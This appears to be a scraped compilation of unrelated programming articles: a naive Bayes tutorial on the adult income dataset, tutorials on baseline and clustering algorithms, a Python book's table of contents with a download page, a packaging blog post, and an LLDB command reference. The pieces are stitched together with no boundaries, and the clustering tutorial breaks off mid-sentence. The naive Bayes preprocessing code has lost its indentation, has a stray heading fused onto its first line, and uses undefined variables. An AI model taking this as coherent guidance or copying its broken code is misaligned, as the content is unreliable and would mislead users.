
Data Mining Experiment 2: Writing a Naive Bayes Classifier in Python

1. Introduction

Building on the naive Bayes theory described in the previous post, this article implements a simple naive Bayes classifier, following a lab assignment from San Diego State University, and evaluates it on test data.

Project address:

2. Writing the Classifier

2.1 Data Description

We use the "adult" dataset: the training input is adult.data and the test file is adult.test. Each line of the data is one record describing a person.

Variables in the dataset:

Variable        Meaning
age             age
type_employer   type of employment (self-employed, government, etc.)
fnlwgt          a variable we ignore
education       education level
education_num   numeric education level (same information as the previous field, also ignored)
marital         marital status
occupation      occupation
relationship    household relationship (hard to describe precisely)
race            race
sex             sex
capital_gain    capital gains
capital_loss    capital losses
hr_per_week     hours worked per week
country         country of origin
income          whether yearly income is >50K

The referenced write-up uses R, which is exceptionally strong for data mining and statistics, almost purpose-built for them. Python has the NumPy library as well, but here only NumPy's median function is used; everything else is handled with native Python types.

2.2 Framework Design

Following the earlier post "Writing a Naive Bayes Classifier in Python", we also use dictionaries for the counting, but split them into two: dataset_high for records with income >50K and dataset_low for records with income <=50K.

class DataSet:
    def __init__(self):
        # Raw records as read from the file
        self.data = []
        # Median of capital_loss
        self.loss_mid = 0
        # Median of capital_gain
        self.gain_mid = 0
        # Median of hours worked per week
        self.hours_mid = 0
        # Median of age
        self.age_mid = 0
        # The per-field counts -- the main data structure
        self.classfied_dataset = None
        # Total number of records
        self.len_data = 0

The final computation is the one described in the earlier post: for each record, compare

P(>50K | features) ∝ P(>50K) * P(feature_1 | >50K) * ... * P(feature_n | >50K)
P(<=50K | features) ∝ P(<=50K) * P(feature_1 | <=50K) * ... * P(feature_n | <=50K)

Whichever of the two is larger becomes the model's verdict on whether the income is above 50K.

Simplifying the formula: since the shared term P(features) is identical in both expressions for any given record, it is dropped from the calculation.

2.3 输入数据预处理 a = ["age", "type_employer", "fnlwgt", "education", "education_num", "marital", "occupation", "relationship", "race",
"sex", "capital_gain", "capital_loss", "hr_per_week", "country", "income"]
classfiled_data = {}
loss_median = loss
gain_median = gain
for node in a:
classfiled_data[node] = {}
for line in data:
if len(line) < 10:
continue
for node in a:
if line[a.index(node)] in classfiled_data[node]:
classfiled_data[node][line[a.index(node)]] += 1
else:
classfiled_data[node][line[a.index(node)]] = 1

The list a holds all the field names. Every record is tallied into classfiled_data field by field, producing a structure of the following shape:

# Printed (and already simplified) output of classfiled_data
{education:
{'Prof-school': 153, 'dropout': 4009, 'Doctorate': 107, 'HS-grad': 8826, 'Bachelors': 3134, 'Assoc': 1823, 'Some-college': 5904, 'Masters': 764},
marital:
{'Widowed': 908, 'Never-married': 10192, 'not-married': 5323, 'Married': 8297},
country:
{'other': 133, 'United-States': 21999, 'British-Commonwealth': 230, 'SE-Asia': 242, 'Euro_1': 159, 'Euro_2': 122, '?': 437, 'South': 64, 'China': 100, 'Latin-America': 1027, 'South-America': 207},
income:
{'<=50K': 24720},
capital_gain:
{'low': 0, 'none': 23685, 'high': 1035},
relationship:
{'Not-in-family': 7449, 'Own-child': 5001, 'Other-relative': 944, 'Husband': 7275, 'Wife': 823, 'Unmarried': 3228},}

That is, the first-level keys of classfiled_data are the fields listed in a; each field maps to its possible values, and the numbers are how often each value occurs across the whole dataset.

2.4 Field Simplification

Drop the useless fnlwgt field and the redundant education_num field.

For the employment-type field, Never-worked and Without-pay can be merged into a single not-working value, and other values can be merged in a similar way. The merge works by first creating a new key such as 'not-working' in classfiled_data['type_employer'] whose value is the sum of the counts of the original keys ['Never-worked', 'Without-pay']. After writing this out longhand for a while, I extracted it into a function:

def tiny(a_list, category, new_name):
    if new_name not in classfiled_data[category]:
        classfiled_data[category][new_name] = 0
    for key in list(classfiled_data[category]):
        if key in a_list and key != new_name:
            classfiled_data[category][new_name] += classfiled_data[category][key]
            del classfiled_data[category][key]

tiny(['Never-worked', 'Without-pay'], 'type_employer', 'not-working')
tiny(['Local-gov', 'State-gov'], 'type_employer', 'other-govt')
tiny(['Self-emp-inc', 'Self-emp-not-inc'], 'type_employer', 'self-employed')

The other fields were simplified in the same way.

A few fields need special handling:

capital_gain - split into three ranges using the median: (-INF, 0], (0, mid], (mid, INF]
capital_loss - same as above
hr_per_week - bucketed into 10-hour intervals; the maximum value of 99 is mapped to the 100s bucket
age - bucketed into 20 groups of 5 years each (a rough sketch of this mapping is shown below)
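For illustration only, the capital_gain/capital_loss and age mappings might look roughly like this (the helper names are mine, not from the original project):

def discretize_gain(value, median):
    """Map a capital_gain or capital_loss number into 'none', 'low' or 'high'."""
    value = int(value)
    if value <= 0:
        return 'none'
    return 'low' if value <= median else 'high'

def bucket_age(age):
    """Group ages into 5-year bands, e.g. 37 -> '35-39'."""
    low = (int(age) // 5) * 5
    return '%d-%d' % (low, low + 4)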

3. Testing the Model

Because the training data was simplified as above, the test input has to be mapped through the same bucketing; in my code this is done with a pre-built mapping dictionary.

For each test record, compute P(features of the record | >50K) and P(features of the record | <=50K), and return the class with the larger value.
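A rough sketch of that comparison (the attribute names follow the DataSet class above, while the zero-count fallback is my own choice):

def predict_over_50k(record, dataset_low, dataset_high):
    """Return True if the naive Bayes model votes for income >50K.

    record maps each field to its (already bucketed) value; dataset_low and
    dataset_high hold the counts built above for the <=50K and >50K classes.
    """
    # Start from the class priors (up to a shared constant)
    p_low = float(dataset_low.len_data)
    p_high = float(dataset_high.len_data)
    for field, value in record.items():
        # Multiply in P(value | class); unseen values get a small pseudo-count
        low_count = dataset_low.classfied_dataset[field].get(value, 0.5)
        high_count = dataset_high.classfied_dataset[field].get(value, 0.5)
        p_low *= float(low_count) / dataset_low.len_data
        p_high *= float(high_count) / dataset_high.len_data
    return p_high > p_low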

The final results on the test set:

Correct predictions: 13206
Incorrect predictions: 3075
Accuracy: 0.811130

From Scratch: Implementing Baseline Machine Learning Algorithms in Python


When building predictive models, it is important to establish a baseline level of performance.

The baseline gives you a point of comparison for evaluating more advanced methods.

In this tutorial you will learn how to implement baseline machine learning algorithms in Python. After completing it you will know:

How to implement the random prediction algorithm

How to implement the zero rule algorithm

Let's get started!

Description

There are many machine learning algorithms to choose from; hundreds, in fact. So before picking one, you need to evaluate its predictions. But how do you know whether the results are any good?

The answer is to use a baseline prediction algorithm. Like any other model, a baseline produces a set of predictions that can be evaluated, for example with classification accuracy or RMSE.

Those scores provide the point of comparison needed when evaluating all other machine learning algorithms on the problem.

Once you have computed the baseline's score, you can tell how much better a given algorithm really is than the naive baseline, which gives you a basis for judging it.

The two most commonly used baselines are:

The random prediction algorithm

The zero rule algorithm

When you face a new problem that is trickier than a conventional classification or regression task, a good first step is to design a random prediction algorithm based on the characteristics of the problem. Later you can improve on it and design a zero rule algorithm.

Let's implement these algorithms and see how they work.

Tutorial

This tutorial is divided into two parts:

The random prediction algorithm

The zero rule algorithm

These steps will give you the foundation you need to implement and compute baseline performance for a machine learning algorithm.

1. Random Prediction Algorithm

The random prediction algorithm predicts a random outcome from among those observed in the training data. It may be the simplest algorithm in machine learning.

It requires that the training set contain all possible outcome values; for regression problems with many distinct values, that set can be very large.

Because random numbers are used to make predictions, it is best to fix the random seed before using the algorithm. This ensures that we get the same sequence of random numbers, and therefore the same decisions, every time the algorithm is run.

Below is the random prediction algorithm implemented in a function named random_algorithm().

The function takes two arguments: the training set, which contains the output values, and the test set, whose output values are to be predicted.

The function works for both classification and regression. It assumes that the output value in the training set is the last column of each row.

First, the set of unique output values is collected from the training data. Then a value is chosen from that set at random as the prediction for each row of the test set.

# Generate random predictions
def random_algorithm(train, test):
    output_values = [row[-1] for row in train]
    unique = list(set(output_values))
    predicted = list()
    for row in test:
        index = randrange(len(unique))
        predicted.append(unique[index])
    return predicted

We can test this function with a small dataset that, for simplicity, contains only the output column.

The training set's output values are 0 or 1, so the algorithm's set of candidate predictions is {0, 1}. The test set's output column is empty before prediction.

from random import seed
from random import randrange

# Generate random predictions
def random_algorithm(train, test):
    output_values = [row[-1] for row in train]
    unique = list(set(output_values))
    predicted = list()
    for row in test:
        index = randrange(len(unique))
        predicted.append(unique[index])
    return predicted

seed(1)
train = [[0], [1], [0], [1], [0], [1]]
test = [[None], [None], [None], [None]]
predictions = random_algorithm(train, test)
print(predictions)

Running the example computes random predictions for the test set and prints them.

[0, 1, 1, 0]

The random prediction algorithm is easy to implement and fast to run, but as a baseline we can do better.

2. Zero Rule Algorithm

The zero rule algorithm is a better baseline than random prediction. For a given problem it uses more of the available information to build its prediction rule, and the rule depends on the type of problem.

Let's start with classification problems, where we predict a class label.

Classification

For classification, one rule is to predict the class value that is most common in the training set. This means that if a training set has 90 instances of class 0 and 10 instances of class 1, every prediction will be 0, giving a baseline accuracy of 90/100, or 90%.

That is much better than the random prediction algorithm, which would only average about 82% accuracy. The estimate of the random algorithm's accuracy is computed as follows:

= ((0.9 * 0.9) + (0.1 * 0.1)) * 100

= 82%

Below is a zero rule algorithm for classification, in a function named zero_rule_algorithm_classification().

# zero rule algorithm for classification
def zero_rule_algorithm_classification(train, test):
    output_values = [row[-1] for row in train]
    prediction = max(set(output_values), key=output_values.count)
    predicted = [prediction for i in range(len(test))]
    return predicted

The function uses max() with its key argument, which is a neat trick. Given the set of class values observed in the training data, max() calls the count function on each value and returns the one with the highest count.

The result is the class value with the highest count in the training data.

If all class values have the same count, the first class value observed in the dataset is chosen.

Once the most frequent class value has been chosen, it is used as the prediction for every row of the test set.

Below is an example using a contrived dataset with 4 instances of class 0 and 2 instances of class 1. The algorithm picks the class value 0 as the prediction for every row in the test set.

from random import seed
from random import randrange

# zero rule algorithm for classification
def zero_rule_algorithm_classification(train, test):
    output_values = [row[-1] for row in train]
    prediction = max(set(output_values), key=output_values.count)
    predicted = [prediction for i in range(len(test))]
    return predicted

seed(1)
train = [['0'], ['0'], ['0'], ['0'], ['1'], ['1']]
test = [[None], [None], [None], [None]]
predictions = zero_rule_algorithm_classification(train, test)
print(predictions)

Running this code makes the predictions and prints them to the screen. As expected, the class value 0 is chosen and used for every prediction.

['0', '0', '0', '0']

Now let's look at the zero rule algorithm for regression problems.

Regression

Regression problems require predicting a continuous value. A good default is to predict a measure of central tendency, such as the mean or the median. Using the mean of the output values observed in the training set is a sensible default: its error is likely to be lower than random prediction, which would return any observed output value.

Below is a function named zero_rule_algorithm_regression(). It works by computing the mean of the observed output values:

mean = sum(values) / count(values)

Once the mean has been computed, it is used as the prediction for every row of the test data.

from random import randrange

# zero rule algorithm for regression
def zero_rule_algorithm_regression(train, test):
    output_values = [row[-1] for row in train]
    prediction = sum(output_values) / float(len(output_values))
    predicted = [prediction for i in range(len(test))]
    return predicted

This function can be tested with a simple example.

We can construct a small dataset whose mean is known to be 15:

10, 15, 12, 15, 18, 20

mean = (10 + 15 + 12 + 15 + 18 + 20) / 6
     = 90 / 6
     = 15

Below is the complete example. We expect the prediction for each of the 4 test rows to be the mean, 15.

from random import seed
from random import randrange

# zero rule algorithm for regression
def zero_rule_algorithm_regression(train, test):
    output_values = [row[-1] for row in train]
    prediction = sum(output_values) / float(len(output_values))
    predicted = [prediction for i in range(len(test))]
    return predicted

seed(1)
train = [[10], [15], [12], [15], [18], [20]]
test = [[None], [None], [None], [None]]
predictions = zero_rule_algorithm_regression(train, test)
print(predictions)

Running the example computes the predictions for the test set and prints them. As expected, the predicted value for every test row is the mean, 15.

[15.0, 15.0, 15.0, 15.0]

Extensions

Here are some extensions of the baseline algorithms that you can implement yourself.

Predict using another central-tendency statistic such as the median or mode instead of the mean (a sketch using the median follows below).

For time series problems, use a moving average: predict with the mean of the last n records.
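For example, the first extension could be sketched like this (this snippet is not part of the original tutorial; it follows the same conventions as the functions above):

# zero rule algorithm for regression using the median instead of the mean
def zero_rule_algorithm_regression_median(train, test):
    output_values = sorted(row[-1] for row in train)
    mid = len(output_values) // 2
    if len(output_values) % 2 == 1:
        prediction = output_values[mid]
    else:
        prediction = (output_values[mid - 1] + output_values[mid]) / 2.0
    predicted = [prediction for i in range(len(test))]
    return predicted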

Review

In this tutorial you learned about the importance of computing baseline performance on a machine learning problem.

You now know:

How to implement the random prediction algorithm for classification and regression problems

How to implement the zero rule algorithm for classification and regression problems

Related links:

From Scratch: Linear Regression with Stochastic Gradient Descent in Python

From Scratch: Implementing the Random Forest Algorithm in Python

用Python做科学计算 (Python for Scientific Computing), high-resolution PDF


The book 用Python做科学计算 (Python for Scientific Computing) explains how to build scientific-computing applications with Python. Besides numerical computation, it focuses on producing interactive 2D and 3D graphics, designing polished program interfaces, integrating with fast computation code written in C, and writing audio and image processing algorithms.

Screenshots of the PDF: [images omitted]

Table of Contents

Part I: Fundamentals

An introductory tour of the libraries used in scientific computing

Installing and introducing the packages
    Installing the packages
    An overview of the libraries

NumPy - fast data processing
    The ndarray object
    ufunc operations
    Matrix operations
    File I/O

SciPy - a library for numerical computation
    Least-squares fitting
    Minimizing a function
    Solving systems of nonlinear equations
    B-spline curves
    Numerical integration
    Solving systems of ordinary differential equations
    Filter design
    Embedding C with Weave

SymPy - a good helper for symbolic math
    The classic formula on the cover
    The volume of a sphere

matplotlib - drawing beautiful charts
    Quick plotting
    Plots with multiple axes
    Configuration files
    Artist objects

Traits - adding type declarations to Python
    Background
    What Traits are
    Adding trait attributes dynamically
    Property attributes
    Listening to trait attributes

TraitsUI - building user interfaces with ease
    Default views
    Custom views
    Configuring views

Chaco - interactive charts
    Script-oriented plotting
    Application-oriented plotting

TVTK - visualizing data in 3D
    A quick introduction to TVTK
    Improvements to TVTK

Mayavi - more convenient visualization
    Quick plotting with mlab
    The Mayavi application
    Embedding Mayavi in an interface

Visual - building 3D demo animations
    Scenes, objects and cameras
    A simple animation
    A ball bouncing in a box

OpenCV - image processing and computer vision
    Reading and writing image and video files

Part II: Manuals

Translations of the user manuals of the individual libraries

Traits user manual
    traits
    traits.ui

Visual user manual
    The scene window

Part III: In Practice

Using what you have learned to solve real problems

Audio input and output
    Reading and writing WAVE files
    Playing and recording with pyAudio
    Playing MP3s with pyMedia

Digital signal systems
    FIR and IIR filters
    FIR filter design
    IIR filter design
    The frequency response of filters
    A biquad equalizer design tool

FFT demo programs
    A refresher on the FFT
    Synthesizing time-domain signals
    A triangle-wave FFT demo

Frequency-domain signal processing
    Inspecting a signal's spectrum
    Fast convolution
    The Hilbert transform

ctypes and NumPy
    Speeding up computation with ctypes
    Calling DLLs with ctypes
    NumPy's support for ctypes

Adaptive filters and an NLMS simulation
    An introduction to adaptive filters
    The NLMS update formulas
    A NumPy implementation
    Writing the DLL functions
    The ctypes Python interface

Simulating single and double pendulums
    Single pendulum simulation
    Double pendulum simulation

Fractals and chaos
    The Mandelbrot set
    Iterated function systems (IFS)
    L-system fractals

Appendix

About the writing of this book
    The tools used to write this book
    Problems and solutions
    Notes on using ReST
    Unresolved issues

Recent updates

Source code collection

The PDF can be downloaded from the LinuxIDC (Linux公社) resource site:

------------------------------------------

Free download address: http://linux.linuxidc.com/

The username and password are both www.linuxidc.com

The download directory is /2017年资料/2月/3日/数据库原理(第5版)PDF+PPT习题资料集合/

For download instructions see http://www.linuxidc.com/Linux/2013-07/87684.htm

------------------------------------------

Permanent link to this article: http://www.linuxidc.com/Linux/2017-02/140193.htm

Rene Dudfield: python packaging zero - part one


In part zero of this series,

I pontificated on,

" What would python packaging zero look like? "

A zero'd package contains just code (and data). Nothing else.

Code readability is important. Code changeability is important.

These two things have always been a core part of what makes python good. However, the current python packaging world fails on both counts. It's actually pretty damn good overall though (binary wheels for most platforms, a resilient CDN, cached packages, dependency management, enhancement peps are being written, there's now a pypa organisation on github where people collaborate on code together... all good stuff).

However, having 10-40 config files in your repo is not readable, nor easily changeable. Which are the files that matter?

Generating files from a template is not changeable.

Django, rails, cookiecutter, sampleproject - they all generate dozens of files for your project from a template. But when you want to change these files?

Being able to change the name of your package or app is important. Especially for creative coding, where you don't even know what you're making! (I would suggest all the best types of coding are creative and have this factor). If we are going to try and get the game and arts communities to use packages, then no way in hell should we point them at this huge complexity of what the current packaging system is.

i_can_not_think_of_a_name.py

So you start right away on the thing that matters. (hint, that's not packaging, it's your code). Then you eventually figure out you're writing an app to help save the whales from idiots.

savethewhales.py

You just rename the file. That's all you need in the repo. In the normal python packaging way you have to also update the setup.py, and all sorts of other places. Quite possibly causing hours of debugging later when something doesn't work.

What other packaging information can be derived?

Previously I mentioned how other pieces of packaging metadata can be derived. Things like the package name, and the author_email. What else do we need, and where do we get it from?

If there is a " data/ " folder then package that up. This is a convention. If there is a test_savethewhales.py then perhaps run the tests before release. Again, a convention. What does the package depend on? Does it use pygame or click? Add them to the " requirements " inside of setup.py. These can be obtained by "pip freeze ", or by parsing the package imports. Are there command line scripts in the app? Does savethewhales.py have a if __name__ == '__main__' and a main() function? Then lets make a "console_script" in the setup.py which generates the "savethewhales.exe" on windows, and the "savethewhales" script on unix. Can folders be used as well as single file packages?

Yep. Now a folder with a .py file in it is considered a package by python (3.3+). So if we run our tool on a repo that contains a folder with files in it, then that is a package. This is easy to detect.


punchnazis/trumps.py
punchnazis/humans.py
punchnazis/main.py
data/

Say you have a game where you punch nazis (eg. wolfenstein altright edition), then the packaging tool can see these files, and make it upload a 'punchnazis' package for you. So then you can 'python3 -m punchnazis', or call the script: 'punchnazis'.
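None of this needs heavy machinery. As an illustration only (derive_metadata and the shape of its result are hypothetical, not part of any existing tool), most of the conventions above can be derived with the standard library:

import ast
import pathlib

def derive_metadata(path):
    """Guess a package name, console_script and requirements from one .py file."""
    path = pathlib.Path(path)
    tree = ast.parse(path.read_text())
    name = path.stem
    # a main() function at module level suggests a console_script entry point
    has_main = any(isinstance(node, ast.FunctionDef) and node.name == 'main'
                   for node in tree.body)
    # top-level imports give a first approximation of the requirements
    imports = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imports.update(alias.name.split('.')[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module.split('.')[0])
    return {
        'name': name,
        'console_scripts': ['%s = %s:main' % (name, name)] if has_main else [],
        'requires': sorted(imports),
    }

print(derive_metadata('savethewhales.py'))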
Complexity when we need it.

Optimize for simple cases, allow handling the complex cases.

What if this doesn't work for my package? Not all packages will be able to work with this (I would suggest many can however). In these cases, you are free to add all the extra special cases in your own setup code. At that point start adding all the 20 config files you need. (Have you seen some of the setup.py files in the wild? There's all sorts of special case handling for things that matter for those packages).

We should optimize for these simple use cases, because most of our code should be simple . We use convention, we make good (but opinionated) choices, we derive the information.

A temporary folder where setup.py files are generated for release.

When doing a release, we tag the version in git, and increment.

Generating a temporary folder with all the setup.py files, the MANIFEST.in, the code and data copied in. tox can run the tests. Twine can upload to pypi, docs can be uploaded to readthedocs, all that good business.

(If you want to join the discussion on packaging games, please join us on the pygame mailing list).

[ED: I was pointed at these two tools which also show a dislike of lots of packaging boilerplate code: flit https://pypi.python.org/pypi/flit and pbr http://docs.openstack.org/developer/pbr/ ]

LLDB Commands and Extensions


List breakpoints

br l

Delete a breakpoint (2 is the breakpoint id)

br delete 2

Enable a breakpoint

br e 2

Disable a breakpoint

br di 2

Set a breakpoint (30 is the line number)

b ViewController.m:30

Set a symbolic breakpoint

br set -n viewDidLoad

Set a breakpoint condition

br mod -c "totalValue > 3000" 2

Remove a breakpoint condition

br mod -c "" 2

Run several commands when a breakpoint is hit

br com add 2 > bt > continue > DONE

Continue execution

continue (or c)

Step over

n

Step into

s

Step out of the current function

finish

The expr command: change program data and behavior at run time without editing the code

expr self.view.hidden = YES
expr -L -- 5+5
expr (void)NSLog(@"hello world")
expr -- (CGRect)[self.view frame]
expr int $debugVar = 5
expr NSString *$debugString = @"ezio cham"
expr NSData *$data = [$jsonString dataUsingEncoding: 4] // lldb does not understand enums, so pass the concrete value

The backtrace command

bt
bt all

The thread command: useful when tracking down multithreading issues

thread backtrace
thread backtrace all

Show the thread list

thread list

Select the thread with id 1

thread select 1

Use the thread command to stop at a line, like a breakpoint (100 is the line number)

thread until 100

Change a method's return value (run it on the line containing the return statement)

thread return @"new result"

example:

thread until 63 (line 63 is where the current method's return statement is)
thread return YES

The frame command

Show the variables of the current frame

frame variable

Show the value of the variable named varName in the current frame

frame variable varName
frame info

Select the frame with id 2

frame select 2

Select the frame adjacent to the current one

frame select -relative -1

watchpoint

Show the current watchpoints

watchpoint list
watchpoint delete 1
watchpoint set variable varName

You can also watch an expression (my_pointer is the expression's value)

watchpoint set expression -- my_pointer

Set a condition on a watchpoint

watchpoint modify -c "_x > 0" 1

Remove the condition

watchpoint modify -c "" 1

The script command

Show the Python version lldb is using

script print(sys.version)

Enter lldb's Python environment

script

Attach a Python script to a breakpoint

breakpoint command add -s python 1

Use the Python function my_script.breakpoint_func

breakpoint command add -F my_script.breakpoint_func 1

The command command

Import a Python script and register a new command named cmd_name

command script import "~/my_script.py"
command script add -f my_script.python_function cmd_name
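For reference, a minimal sketch of what such a my_script.py might contain (the function names match the commands above, and the signatures follow LLDB's documented Python conventions):

# my_script.py
import lldb

def python_function(debugger, command, result, internal_dict):
    # Body of the custom cmd_name command; 'command' holds its arguments.
    result.AppendMessage("cmd_name called with: %s" % command)

def breakpoint_func(frame, bp_loc, internal_dict):
    # Runs each time the breakpoint is hit; return False to keep the process running.
    print("hit " + str(frame.GetFunctionName()))
    return False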

Import a Python script and use it from a breakpoint

command script import "~/my_script.py"
breakpoint command add -F my_script.breakpoint_func 1

Import another lldb script

command script import "~/my_script.txt"

Remove the command pf

command unalias pf

Show the command history (the report navigator has more detail)

command list

alias

Show all current aliases

help -a

Find aliases related to a keyword

apropos break

Define a positional alias

command alias sbr breakpoint set -l %1
command alias pf expr (CGRect)[self.view frame]

Define a regex alias

command regex sbr 's/([0-9]+)/breakpoint set -l %1/'
command regex pf 's/(.+)/expr (CGRect)[%1 frame]/' 's/^$/expr (CGRect)[self.view frame]/'

Persisting aliases

Create a ~/.lldbinit file and add the following:

command regex pf 's/(.+)/expr (CGRect)[%1 frame]/' 's/^$/expr (CGRect)[self.view frame]/'

Custom summaries

type summary add CGRect -s "width = ${var.size.width}, height = ${var.size.height}"

Set a summary for SavingsAccount

command script import ~/account.py
type summary add -F account.count_summary SavingsAccount

Delete a summary

type summary delete CGRect

Filter: only show the firstName property

type filter add SavingsAccount --child _firstName

Change the display format

typedef int hex_month
type format add --format hex hex_month

quicklook

Quick Look in lldb

https://github.com/ryanolsonk/LLDB-QuickLook

Quick Look in Xcode

http://nshipster.com/quick-look-debugging/

Extending LLDB with custom commands

lldb's Python API documentation

http://lldb.llvm.org/python_reference/index.html

Chisel: Facebook's LLDB extensions

border self.view
border --color green self.view

Make a view transparent

mask self.button

Restore a view from the transparent state

unmask self.button

Print the current layer tree

pca

Print the current view hierarchy

pviews

Print a view's responder chain

presponder self.view

Interactively browse the view hierarchy

vs self.view

Redraw the current UI

caflush

Flash a view quickly

flicker self.view

Show a view

show self.view

Hide a view

hide self.view

Print a class's inheritance hierarchy

pclass self.property

Preview a screenshot of a view

visualize self.view

Restricting uploads to public PyPI


Many companies use an internal PyPI server for storing their proprietary python packages. This makes managing python libraries and application dependencies so much easier. But unfortunately this also makes it easy for people to accidentally upload their private code to the public PyPI unintentionally.

Lucky for us, there's a cool extension to setuptools called restricted_pkg! Unlucky for us, it leaves something to be desired in terms of user experience. Let's say we have an example library called xl which uses restricted_pkg to prevent accidental uploads. Building on the usage given in restricted_pkg's docs, our setup.py will go like this:

from setuptools import find_packages
from restricted_pkg import setup

setup(
    name='xl',
    version='0.1.0',
    packages=['xl'],
    private_repository="https://pypi.example.com",
    install_requires=[
        "distribute",
        "restricted_pkg",
    ],
)

So far so good. But when we try to pip install that in a clean virtualenv, it's going to fail.

$ pip install -e xl/
Obtaining file:///Users/codyaray/xl
    Complete output from command python setup.py egg_info:
    Traceback (most recent call last):
      File "", line 20, in
      File "/Users/codyaray/xl/setup.py", line 2, in
        from restricted_pkg import setup
    ImportError: No module named restricted_pkg
    ----------------------------------------
Command "python setup.py egg_info" failed with error code 1 in /Users/codyaray/xl

That makes us sad. Why must restricted_pkg make our users do more work? No!

The workaround I've developed is to check whether restricted_pkg is already installed and auto-install it if it's missing. Since this is a standard python import, we can't really rely on setuptools magic. The simplest, most concise way I've found so far is to wrap the import in a try/except and programmatically invoke pip (in a hacky, abusive way).

try:
    from restricted_pkg import setup
except ImportError:
    import pip
    pip.main(['install', 'restricted_pkg'])
    from restricted_pkg import setup

setup(
    name='xl',
    version='0.1.0',
    packages=['xl'],
    private_repository='https://pypi.example.com',
)

It's a minimum of boilerplate, very comprehensible, and gets the job done.

K-Means & Other Clustering Algorithms: A Quick Intro with Python


This post was originally published here

Clustering is the grouping of objects together so that objects belonging to the same group (cluster) are more similar to each other than those in other groups (clusters). In this intro cluster analysis tutorial, we'll check out a few algorithms in python so you can get a basic understanding of the fundamentals of clustering on a real dataset.

The Dataset

For the clustering problem, we will use the famous Zachary’s Karate Club dataset. The story behind the data set is quite simple: There was a Karate Club that had an administrator “John A” and an instructor “Mr. Hi” (both pseudonyms). Then a conflict arose between them, causing the students (Nodes) to split into two groups. One that followed John and one that followed Mr. Hi.


K-Means &amp; Other Clustering Algorithms: A Quick Intro with Python
Source: Wikipedia Getting Started with Clustering in Python

But enough with the introductory talk, let's get to the main reason you are here, the code itself. First of all, you need to install both scikit-learn and networkx libraries to complete this tutorial. If you don't know how, the links above should help you. Also, feel free to follow along by grabbing the source code for this tutorial over on Github.

Usually, the datasets that we want to examine are available in text form (JSON, Excel, simple txt file, etc.) but in our case, networkx provide it for us. Also, to compare our algorithms, we want the truth about the members (who followed whom) which unfortunately is not provided. But with these two lines of code, you will be able to load the data and store the truth (from now on we will refer it as ground truth):

# Imports used by the snippets in this post
import networkx as nx
import matplotlib.pyplot as plt
from collections import defaultdict
from sklearn import cluster

# Load and Store both data and groundtruth of Zachary's Karate Club
G = nx.karate_club_graph()
groundTruth = [0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,0,1,0,1,1,1,1,1,1,1,1,1,1,1,1]

The final step of the data preprocessing, is to transform the graph into a matrix (desirable input for our algorithms). This is also quite simple:

def graphToEdgeMatrix(G):
    # Initialize Edge Matrix
    edgeMat = [[0 for x in range(len(G))] for y in range(len(G))]

    # For loop to set 0 or 1 (diagonal elements are set to 1)
    for node in G:
        tempNeighList = G.neighbors(node)
        for neighbor in tempNeighList:
            edgeMat[node][neighbor] = 1
        edgeMat[node][node] = 1

    return edgeMat

Before we get going with the Clustering Techniques, I would like you to get a visualization on our data. So, let’s compile a simple function to do that:

def drawCommunities(G, partition, pos):
    # G is graph in networkx form
    # Partition is a dict containing info on clusters
    # Pos is base on networkx spring layout (nx.spring_layout(G))

    # For separating communities colors
    dictList = defaultdict(list)
    nodelist = []
    for node, com in partition.items():
        dictList[com].append(node)

    # Get size of Communities
    size = len(set(partition.values()))

    # For loop to assign communities colors
    for i in range(size):
        amplifier = i % 3
        multi = (i / 3) * 0.3
        red = green = blue = 0

        if amplifier == 0:
            red = 0.1 + multi
        elif amplifier == 1:
            green = 0.1 + multi
        else:
            blue = 0.1 + multi

        # Draw Nodes
        nx.draw_networkx_nodes(G, pos,
                               nodelist=dictList[i],
                               node_color=[0.0 + red, 0.0 + green, 0.0 + blue],
                               node_size=500,
                               alpha=0.8)

    # Draw edges and final plot
    plt.title("Zachary's Karate Club")
    nx.draw_networkx_edges(G, pos, alpha=0.5)

What that function does is to simply extract the number of clusters that are in our result and then assign a different color to each of them (up to 10 for the given time is fine) before plotting them.


K-Means &amp; Other Clustering Algorithms: A Quick Intro with Python
Clustering Algorithms

Some clustering algorithms will cluster your data quite nicely and others will end up failing to do so. That is one of the main reasons why clustering is such a difficult problem. But don’t worry, we won’t let you drown in an ocean of choices. We’ll go through a few algorithms that are known to perform very well.

K-Means Clustering

[Interactive K-means demo omitted; it lets you vary N (the number of nodes) and K (the number of clusters). Source: github.com/nitoyon/tech.nitoyon.com]

K-means is considered by many the gold standard when it comes to clustering due to its simplicity and performance, and it’s the first one we’ll try out. When you have no idea at all what algorithm to use, K-means is usually the first choice. Bear in mind that K-means might under-perform sometimes due to its concept: spherical clusters that are separable in a way so that the mean value converges towards the cluster center. To simply construct and train a K-means model, use the follow lines:

# K-means Clustering Model
kmeans = cluster.KMeans(n_clusters=kClusters, n_init=200)
kmeans.fit(edgeMat)
# Transform our data to list form and store them in results list
results.append(list(kmeans.labels_))

Agglomerative Clustering

The main idea behind agglomerative clustering is that each node starts in its own cluster, and recursively merges with the pair of clusters that minimally increases a given linkage distance. The main advantage of agglomerative clustering (and hierarchical clustering in general) is that you don’t need to specify the number of clusters. That of course, comes with a price: performance. But, in scikit’s implementation, you can specify the number of clusters to assist the algorithm’s performance. To create and train an agglomerative model use the following code:

# Agglomerative Clustering Model
agglomerative = cluster.AgglomerativeClustering(n_clusters=kClusters, linkage="ward")
agglomerative.fit(edgeMat)
# Transform our data to list form and store them in results list
results.append(list(agglomerative.labels_))

Spectral

The Spectral clustering technique applies clustering to a projection of the normalized Laplacian. When it comes to image clustering, spectral clustering works quite well. See the next few lines of Python for all the magic:

# Spectral Clustering Model
spectral = cluster.SpectralClustering(n_clusters=kClusters, affinity="precomputed", n_init= 200)
spectral.fit(edgeMat)
# Transform our data to list form and store them in results list
results.append(list(spectral.labels_))

Affinity Propagation

Well this one is a bit different. Unlike the previous algorithms, you can see AP does not require the number of clusters to be determined before running the algorithm. AP performs really well on several computer vision and biology problems,
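Following the same pattern as the models above, an Affinity Propagation model can be built without specifying the number of clusters at all. This snippet is my own sketch in the style of the previous ones; the damping value is just an example:

# Affinity Propagation Model (no n_clusters needed)
affinity = cluster.AffinityPropagation(damping=0.6)
affinity.fit(edgeMat)
# Transform our data to list form and store them in results list
results.append(list(affinity.labels_))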

Monitoring MongoDB Driver Events In Motor



